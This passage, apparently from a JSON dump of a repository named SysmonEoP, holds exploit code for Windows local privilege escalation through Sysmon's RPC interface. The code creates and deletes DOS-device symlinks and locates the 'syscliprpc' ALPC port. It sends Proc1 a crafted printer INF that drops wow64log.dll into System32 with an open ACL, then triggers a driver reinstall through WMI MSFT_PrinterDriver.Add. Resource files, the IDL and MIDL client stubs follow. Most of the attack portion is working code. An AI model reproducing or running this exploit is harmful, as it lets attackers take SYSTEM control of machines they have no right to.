(DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH | DDD_REMOVE_DEFINITION | DDD_EXACT_MATCH_ON_REMOVE, object, target)) {\r\n        printf(\"[+] Symlink %ls -> %ls deleted!\\n\", object, target);\r\n        return TRUE;\r\n\r\n    }\r\n    else\r\n    {\r\n        printf(\"error :%d\\n\", GetLastError());\r\n        return FALSE;\r\n\r\n\r\n    }\r\n}\r\n\r\nLPWSTR Find() {\r\n    HANDLE rpccontrolobj;\r\n    OBJECT_ATTRIBUTES obj;\r\n    const wchar_t rpccontrol[] = L\"\\\\RPC Control\";\r\n    UNICODE_STRING unicode_string = { 0 };\r\n    pRtlInitUnicodeString(&unicode_string, rpccontrol);\r\n    InitializeObjectAttributes(&obj, 
&unicode_string, 0, 0, 00);\r\n    NTSTATUS result = pNtOpenDirectoryObect(&rpccontrolobj, 0x0001 | 0x0002, &obj);\r\n    if (result == 0) {\r\n\r\n        BYTE* buffer = (BYTE*)malloc(100000);\r\n\r\n        ULONG start = 0, index = 0, bytes;\r\n        BOOLEAN restart = TRUE;\r\n        for (;;)\r\n        {\r\n            result = pNtQueryDirectoryObject(rpccontrolobj, (PBYTE)buffer, 100000, FALSE, restart, &index, &bytes);\r\n            if (result == 0)\r\n            {\r\n                POBJECT_DIRECTORY_INFORMATION objectlist = (POBJECT_DIRECTORY_INFORMATION)buffer;\r\n                for (ULONG i = 0; i < index - start; i++)\r\n                {\r\n                    if (0 == wcsncmp(objectlist[i].TypeName.Buffer, L\"ALPC Port\", objectlist[i].TypeName.Length / sizeof(WCHAR)))\r\n                    {\r\n                        if (wcsstr(objectlist[i].Name.Buffer, L\"syscliprpc\")) {\r\n                            return objectlist[i].Name.Buffer;\r\n\r\n                        }\r\n\r\n\r\n                    }\r\n                }\r\n            }\r\n            if (STATUS_MORE_ENTRIES == result)\r\n            {\r\n                start = index;\r\n                restart = FALSE;\r\n                continue;\r\n            }\r\n\r\n            else if (STATUS_NO_MORE_ENTRIES == 0 || (result == 0)) {\r\n                CloseHandle(rpccontrolobj);\r\n                break;\r\n\r\n\r\n\r\n            }\r\n        }\r\n        return NULL;\r\n    }\r\n    return NULL;\r\n}\r\n\r\nvoid Trigger(LPWSTR alpc)\r\n{\r\n    RPC_STATUS status;\r\n    RPC_WSTR StringBinding;\r\n    RPC_BINDING_HANDLE Binding;\r\n    wchar_t data[] = L\"; Windows Inbox Printer Drivers\\n\\n[Version]\\nSignature=\\\"$Windows NT$\\\"\\nProvider=\\\"Microsoft\\\"\\nClassGUID={4D36E979-E325-11CE-BFC1-08002BE10318}\\nClass=Printer\\nCatalogFile=prnge001.cat\\nDriverVer = 
06/21/2006,10.0.19041.1\\n\\n\\n[Manufacturer]\\n\\\"Generic\\\"=Generic,NTamd64\\n\\n[Test.CopyFiles]\\nwow64log.dll,TTY.DLL,,4\\n\\n[Test.CopyFiles.security]\\n\\\"D:AI(A;;GA;;;SY)(A;;GA;;;AU)(A;;GA;;;BA)\\\"\\n\\n\\n[Generic.NTamd64]\\n\\\"Generic / Text Only\\\"                                         = TTY.GPD,GenericGeneric_/_Tex8040,Generic_/_Text_Only\\n\\\"Generic IBM Graphics 9pin\\\"                                   = GENIBM9.GPD,GenericGeneric_IBM_GD35A,Generic_IBM_Graphics_9pin\\n\\\"Generic IBM Graphics 9pin wide\\\"                              = GENIBM9W.GPD,GenericGeneric_IBM_GC7D5,Generic_IBM_Graphics_9pin_wide\\n\\\"MS Publisher Color Printer\\\"                                  = MSGENCOL.PPD,GenericMS_Publisher_25C7,MS_Publisher_Color_Printer\\n\\\"MS Publisher Imagesetter\\\"                                    = MSGENBW.PPD,GenericMS_Publisher_B397,MS_Publisher_Imagesetter\\n\\n\\n[TTY.GPD]\\nCopyFiles=@TTYRES.DLL,@TTY.INI,@TTY.DLL,@TTYUI.DLL,@TTY.GPD,@TTYUI.HLP\\nCopyFiles=Test.CopyFiles\\nDataFile=TTY.GPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\\\"\\n\\n[GENIBM9.GPD]\\nCopyFiles=@OK9IBRES.DLL,@GENIBM9.GPD\\nDataFile=GENIBM9.GPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\\\"\\n\\n[GENIBM9W.GPD]\\nCopyFiles=@OK9IBRES.DLL,@GENIBM9W.GPD\\nDataFile=GENIBM9W.GPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\\\"\\n\\n[MSGENCOL.PPD]\\nCopyFiles=@MSGENCOL.PPD\\nDataFile=MSGENCOL.PPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\\\"\\n\\n[MSGENBW.PPD]\\nCopyFiles=@MSGENBW.PPD\\nDataFile=MSGENBW.PPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\\\"\\n\\n[DestinationDirs]\\nDefaultDestDir=66000\\nTest.CopyFiles=11\\n\\n[SourceDisksFiles]\\nMSGENBW.PPD  = 1\\nTTY.DLL      = 1\\nTTYUI.HLP    = 1\\nGENIBM9W.GPD = 1\\nTTY.INI      = 
1\\nMSGENCOL.PPD = 1\\nGENIBM9.GPD  = 1\\nOK9IBRES.DLL = 1\\nTTYUI.DLL    = 1\\nTTYRES.DLL   = 1\\nTTY.GPD      = 1\\n\\n[PrinterPackageInstallation.amd64]\\nPackageAware=TRUE\\nCoreDriverDependencies={D20EA372-DD35-4950-9ED8-A6335AFE79F0},{D20EA372-DD35-4950-9ED8-A6335AFE79F1}\\nInboxVersionRequired=UseDriverVer\\n\\n[Strings]\\n;Non-Localizable\\n\\n;Localizable\\nDisk1=\\\"Windows Installation Disc\\\"\\n\\n[SourceDisksNames.x86]\\n1   = %Disk1%,,,\\\"I386\\\"\\n\\n[SourceDisksNames.amd64]\\n1   = %Disk1%,,,\\\"Amd64\\\"\\n\\n[SourceDisksNames.ia64]\\n1   = %Disk1%,,,\\\"Ia64\\\"\\n\\n[SourceDisksNames.arm]\\n1   = %Disk1%,,,\\\"arm\\\"\\n\\n[SourceDisksNames.arm64]\\n1   = %Disk1%,,,\\\"arm64\\\"\\n\";\r\n    status = RpcStringBindingCompose(NULL, (RPC_WSTR)L\"ncalrpc\", NULL, (RPC_WSTR)alpc, NULL, &StringBinding);\r\n\r\n    status = RpcBindingFromStringBinding(StringBinding, &Binding);\r\n    status = RpcStringFree(&StringBinding);\r\n    RpcTryExcept\r\n    {\r\n        \r\n        Proc1(Binding, 3036,data);\r\n    }\r\n    RpcExcept(EXCEPTION_EXECUTE_HANDLER);\r\n    {\r\n        printf(\"Error: %d\\n\",RpcExceptionCode());\r\n    }\r\n    RpcEndExcept\r\n\r\n        status = RpcBindingFree(&Binding);\r\n}\r\n\r\n\r\n\r\nLPWSTR  BuildPath(LPCWSTR path) {\r\n    wchar_t ntpath[MAX_PATH];\r\n    swprintf(ntpath, L\"\\\\??\\\\%s\", path);\r\n    return ntpath;\r\n}\r\nBOOL AddPrinterDriverWmi() {\r\n    HRESULT hr;\r\n    hr = CoInitializeEx(0, COINIT_MULTITHREADED);\r\n    if (FAILED(hr))\r\n    {\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);\r\n    if (FAILED(hr))\r\n    {\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    IWbemLocator* pLoc = NULL;\r\n\r\n    hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID*)&pLoc);\r\n    if (FAILED(hr))\r\n    
{\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    IWbemServices* pSvc = NULL;\r\n    // MSFT_PrinterDriver lives in ROOT\\StandardCimv2, the namespace behind Add-PrinterDriver.\r\n    hr = pLoc->ConnectServer(_bstr_t(L\"ROOT\\\\StandardCimv2\"), NULL, NULL, 0, NULL, 0, 0, &pSvc);\r\n    if (FAILED(hr)) {\r\n        pLoc->Release();\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    hr = CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);\r\n    if (FAILED(hr)) {\r\n        pSvc->Release();\r\n        pLoc->Release();\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    BOOL ok = FALSE;\r\n    BSTR MethodName = SysAllocString(L\"Add\");\r\n    BSTR ClassName = SysAllocString(L\"MSFT_PrinterDriver\");\r\n    IWbemClassObject* pClass = NULL;\r\n    IWbemClassObject* pInParamsDefinition = NULL;\r\n    IWbemClassObject* pClassInstance = NULL;\r\n    IWbemClassObject* pOutParams = NULL;\r\n    VARIANT varCommand, varCommand2;\r\n    VariantInit(&varCommand);\r\n    VariantInit(&varCommand2);\r\n    hr = pSvc->GetObject(ClassName, 0, NULL, &pClass, NULL);\r\n    if (SUCCEEDED(hr)) hr = pClass->GetMethod(MethodName, 0, &pInParamsDefinition, NULL);\r\n    if (SUCCEEDED(hr)) hr = pInParamsDefinition->SpawnInstance(0, &pClassInstance);\r\n    if (SUCCEEDED(hr)) {\r\n        // Own the BSTRs explicitly: assigning a temporary _bstr_t would leave bstrVal dangling once the temporary is destroyed.\r\n        varCommand.vt = VT_BSTR;\r\n        varCommand.bstrVal = SysAllocString(L\"Generic / Text Only\");\r\n        varCommand2.vt = VT_BSTR;\r\n        // DriverStore folder names carry a per-package hash; this one matches the author's test build and must be adjusted per target.\r\n        varCommand2.bstrVal = SysAllocString(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\");\r\n        hr = pClassInstance->Put(L\"Name\", 0, &varCommand, 0);\r\n        if (SUCCEEDED(hr)) hr = pClassInstance->Put(L\"InfPath\", 0, &varCommand2, 0);\r\n    }\r\n    // Invoke MSFT_PrinterDriver.Add: the spooler re-installs the driver from the (now modified) INF in the driver store.\r\n    if (SUCCEEDED(hr)) hr = pSvc->ExecMethod(ClassName, MethodName, 0, NULL, pClassInstance, &pOutParams, NULL);\r\n    ok = SUCCEEDED(hr);\r\n    if (!ok) printf(\"MSFT_PrinterDriver.Add failed: 0x%08lx\\n\", (unsigned long)hr);\r\n\r\n    // Single cleanup path; every pointer is NULL-checked because any step above may have failed.\r\n    VariantClear(&varCommand);\r\n    VariantClear(&varCommand2);\r\n    SysFreeString(ClassName);\r\n    SysFreeString(MethodName);\r\n    if (pOutParams) pOutParams->Release();\r\n    if (pClassInstance) pClassInstance->Release();\r\n    if (pInParamsDefinition) pInParamsDefinition->Release();\r\n    if (pClass) pClass->Release();\r\n    pSvc->Release();\r\n    
pLoc->Release();\r\n    CoUninitialize();\r\n    return ok;\r\n}\r\nvoid __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)\r\n{\r\n    return((void __RPC_FAR*) malloc(cBytes));\r\n}\r\n\r\nvoid __RPC_USER midl_user_free(void __RPC_FAR* p)\r\n{\r\n    free(p);\r\n}"
  },
  {
    "path": "v1/SysmonEoP/resource.h",
    "content": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by FolderOrFileDeleteToSystem.rc\r\n//\r\n#define IDR_DLL1                        101\r\n\r\n// Next default values for new objects\r\n// \r\n#ifdef APSTUDIO_INVOKED\r\n#ifndef APSTUDIO_READONLY_SYMBOLS\r\n#define _APS_NEXT_RESOURCE_VALUE        107\r\n#define _APS_NEXT_COMMAND_VALUE         40001\r\n#define _APS_NEXT_CONTROL_VALUE         1001\r\n#define _APS_NEXT_SYMED_VALUE           101\r\n#endif\r\n#endif\r\n"
  },
  {
    "path": "v1/SysmonEoP/resource.rc",
    "content": "// Microsoft Visual C++ generated resource script.\r\n//\r\n#include \"resource.h\"\r\n\r\n#define APSTUDIO_READONLY_SYMBOLS\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// Generated from the TEXTINCLUDE 2 resource.\r\n//\r\n#include \"winres.h\"\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#undef APSTUDIO_READONLY_SYMBOLS\r\n/////////////////////////////////////////////////////////////////////////////\r\n// English (United Kingdom) resources\r\n\r\n#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)\r\nLANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK\r\n#pragma code_page(1252)\r\n\r\n#ifdef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// TEXTINCLUDE\r\n//\r\n\r\n1 TEXTINCLUDE\r\nBEGIN\r\n\"resource.h\\0\"\r\nEND\r\n\r\n2 TEXTINCLUDE\r\nBEGIN\r\n\"#include \"\"winres.h\"\"\\r\\n\"\r\n\"\\0\"\r\nEND\r\n\r\n3 TEXTINCLUDE\r\nBEGIN\r\n\"\\r\\n\"\r\n\"\\0\"\r\nEND\r\n\r\n#endif    // APSTUDIO_INVOKED\r\n\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// RBS\r\n//\r\n\r\nIDR_DLL1                DLL                     \"dll.dll\"\r\n\r\n\r\n#endif    // English (United Kingdom) resources\r\n/////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n\r\n#ifndef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// Generated from the TEXTINCLUDE 3 resource.\r\n//\r\n\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#endif    // not APSTUDIO_INVOKED\r\n"
  },
  {
    "path": "v1/SysmonEoP/sysmon.idl",
    "content": "[\r\n\tuuid(1e72d56f-eec6-44d3-bbed-5caa50790812),\r\n\tversion(1.0),\r\n]\r\ninterface DefaultIfName\r\n{\r\n\r\n\tlong Proc0(\r\n\t);\r\n\r\n\tvoid Proc1(\r\n\t\t[in]long arg_0,\r\n\t\t[in][string]  wchar_t* arg_1);\r\n}"
  },
  {
    "path": "v1/SysmonEoP/sysmon_c.c",
    "content": "\r\n\r\n/* this ALWAYS GENERATED file contains the RPC client stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n#if _MSC_VER >= 1200\r\n#pragma warning(push)\r\n#endif\r\n\r\n#pragma warning( disable: 4211 )  /* redefine extern to static */\r\n#pragma warning( disable: 4232 )  /* dllimport identity*/\r\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\r\n\r\n#include <string.h>\r\n\r\n#include \"sysmon_h.h\"\r\n\r\n#define TYPE_FORMAT_STRING_SIZE   7                                 \r\n#define PROC_FORMAT_STRING_SIZE   79                                \r\n#define EXPR_FORMAT_STRING_SIZE   1                                 \r\n#define TRANSMIT_AS_TABLE_SIZE    0            \r\n#define WIRE_MARSHAL_TABLE_SIZE   0            \r\n\r\ntypedef struct _sysmon_MIDL_TYPE_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_TYPE_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_PROC_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_PROC_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_EXPR_FORMAT_STRING\r\n    {\r\n    long          Pad;\r\n    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_EXPR_FORMAT_STRING;\r\n\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
\r\n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _NDR64_RpcTransferSyntax = \r\n{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};\r\n\r\n\r\n\r\nextern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;\r\nextern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;\r\nextern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;\r\n\r\n#define GENERIC_BINDING_TABLE_SIZE   0            \r\n\r\n\r\n/* Standard interface: DefaultIfName, ver. 1.0,\r\n   GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */\r\n\r\n extern const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo;\r\n\r\n\r\nstatic const RPC_CLIENT_INTERFACE DefaultIfName___RpcClientInterface =\r\n    {\r\n    sizeof(RPC_CLIENT_INTERFACE),\r\n    {{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    &DefaultIfName_ProxyInfo,\r\n    0x02000000\r\n    };\r\nRPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcClientInterface;\r\n\r\nextern const MIDL_STUB_DESC DefaultIfName_StubDesc;\r\n\r\nstatic RPC_BINDING_HANDLE DefaultIfName__MIDL_AutoBindHandle;\r\n\r\n\r\nlong Proc0( \r\n    /* [in] */ handle_t IDL_handle)\r\n{\r\n\r\n    CLIENT_CALL_RETURN _RetVal;\r\n\r\n    _RetVal = NdrClientCall3(\r\n                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,\r\n                  0,\r\n                  0,\r\n                  IDL_handle);\r\n    return ( long  )_RetVal.Simple;\r\n    \r\n}\r\n\r\n\r\nvoid Proc1( \r\n    /* [in] */ handle_t IDL_handle,\r\n    /* [in] */ long arg_0,\r\n    /* [string][in] */ wchar_t *arg_1)\r\n{\r\n\r\n    NdrClientCall3(\r\n                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,\r\n                  
1,\r\n                  0,\r\n                  IDL_handle,\r\n                  arg_0,\r\n                  arg_1);\r\n    \r\n}\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\nstatic const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =\r\n    {\r\n        0,\r\n        {\r\n\r\n\t/* Procedure Proc0 */\r\n\r\n\t\t\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/*  6 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  8 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 12 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 14 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 18 */\t0x44,\t\t/* Oi2 Flags:  has return, has ext, */\r\n\t\t\t0x1,\t\t/* 1 */\r\n/* 20 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Return value */\r\n\r\n/* 30 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, */\r\n/* 32 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 34 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Procedure Proc1 */\r\n\r\n/* 36 */\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/* 38 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/* 42 */\tNdrFcShort( 0x1 ),\t/* 1 */\r\n/* 44 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\r\n/* 46 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 48 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 50 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 52 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 54 */\t0x42,\t\t/* Oi2 Flags:  clt must size, has ext, */\r\n\t\t\t0x2,\t\t/* 2 */\r\n/* 56 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, 
*/\r\n/* 58 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 60 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 62 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 64 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Parameter arg_0 */\r\n\r\n/* 66 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\r\n/* 68 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 70 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Parameter arg_1 */\r\n\r\n/* 72 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\r\n/* 74 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 76 */\tNdrFcShort( 0x4 ),\t/* Type Offset=4 */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =\r\n    {\r\n        0,\r\n        {\r\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  2 */\t\r\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\r\n/*  4 */\t\r\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\r\n\t\t\t0x5c,\t\t/* FC_PAD */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const unsigned short DefaultIfName_FormatStringOffsetTable[] =\r\n    {\r\n    0,\r\n    36\r\n    };\r\n\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n\r\n\r\n/* this ALWAYS GENERATED file contains the RPC client stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\n\r\n#include \"ndr64types.h\"\r\n#include 
\"pshpack8.h\"\r\n\r\n\r\ntypedef \r\nstruct _NDR64_CONFORMANT_STRING_FORMAT\r\n__midl_frag7_t;\r\nextern const __midl_frag7_t __midl_frag7;\r\n\r\ntypedef \r\nstruct _NDR64_POINTER_FORMAT\r\n__midl_frag6_t;\r\nextern const __midl_frag6_t __midl_frag6;\r\n\r\ntypedef \r\nNDR64_FORMAT_CHAR\r\n__midl_frag5_t;\r\nextern const __midl_frag5_t __midl_frag5;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n    struct _NDR64_PARAM_FORMAT frag4;\r\n}\r\n__midl_frag4_t;\r\nextern const __midl_frag4_t __midl_frag4;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n}\r\n__midl_frag2_t;\r\nextern const __midl_frag2_t __midl_frag2;\r\n\r\ntypedef \r\nNDR64_FORMAT_UINT32\r\n__midl_frag1_t;\r\nextern const __midl_frag1_t __midl_frag1;\r\n\r\nstatic const __midl_frag7_t __midl_frag7 =\r\n{ \r\n/* *wchar_t */\r\n    { \r\n    /* *wchar_t */\r\n        0x64,    /* FC64_CONF_WCHAR_STRING */\r\n        { \r\n        /* *wchar_t */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0\r\n        },\r\n        (NDR64_UINT16) 2 /* 0x2 */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag6_t __midl_frag6 =\r\n{ \r\n/* *wchar_t */\r\n    0x20,    /* FC64_RP */\r\n    (NDR64_UINT8) 0 /* 0x0 */,\r\n    (NDR64_UINT16) 0 /* 0x0 */,\r\n    &__midl_frag7\r\n};\r\n\r\nstatic const __midl_frag5_t __midl_frag5 =\r\n0x5    /* FC64_INT32 */;\r\n\r\nstatic const __midl_frag4_t __midl_frag4 =\r\n{ \r\n/* Proc1 */\r\n    { \r\n    /* Proc1 */      /* procedure Proc1 */\r\n        (NDR64_UINT32) 17039424 /* 0x1040040 */,    /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */\r\n        (NDR64_UINT32) 24 /* 0x18 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 8 /* 
0x8 */,\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 2 /* 0x2 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* arg_0 */      /* parameter arg_0 */\r\n        &__midl_frag5,\r\n        { \r\n        /* arg_0 */\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [in], Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    },\r\n    { \r\n    /* arg_1 */      /* parameter arg_1 */\r\n        &__midl_frag7,\r\n        { \r\n        /* arg_1 */\r\n            1,\r\n            1,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* MustSize, MustFree, [in], SimpleRef */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        16 /* 0x10 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag2_t __midl_frag2 =\r\n{ \r\n/* Proc0 */\r\n    { \r\n    /* Proc0 */      /* procedure Proc0 */\r\n        (NDR64_UINT32) 17301568 /* 0x1080040 */,    /* explicit handle */ /* 
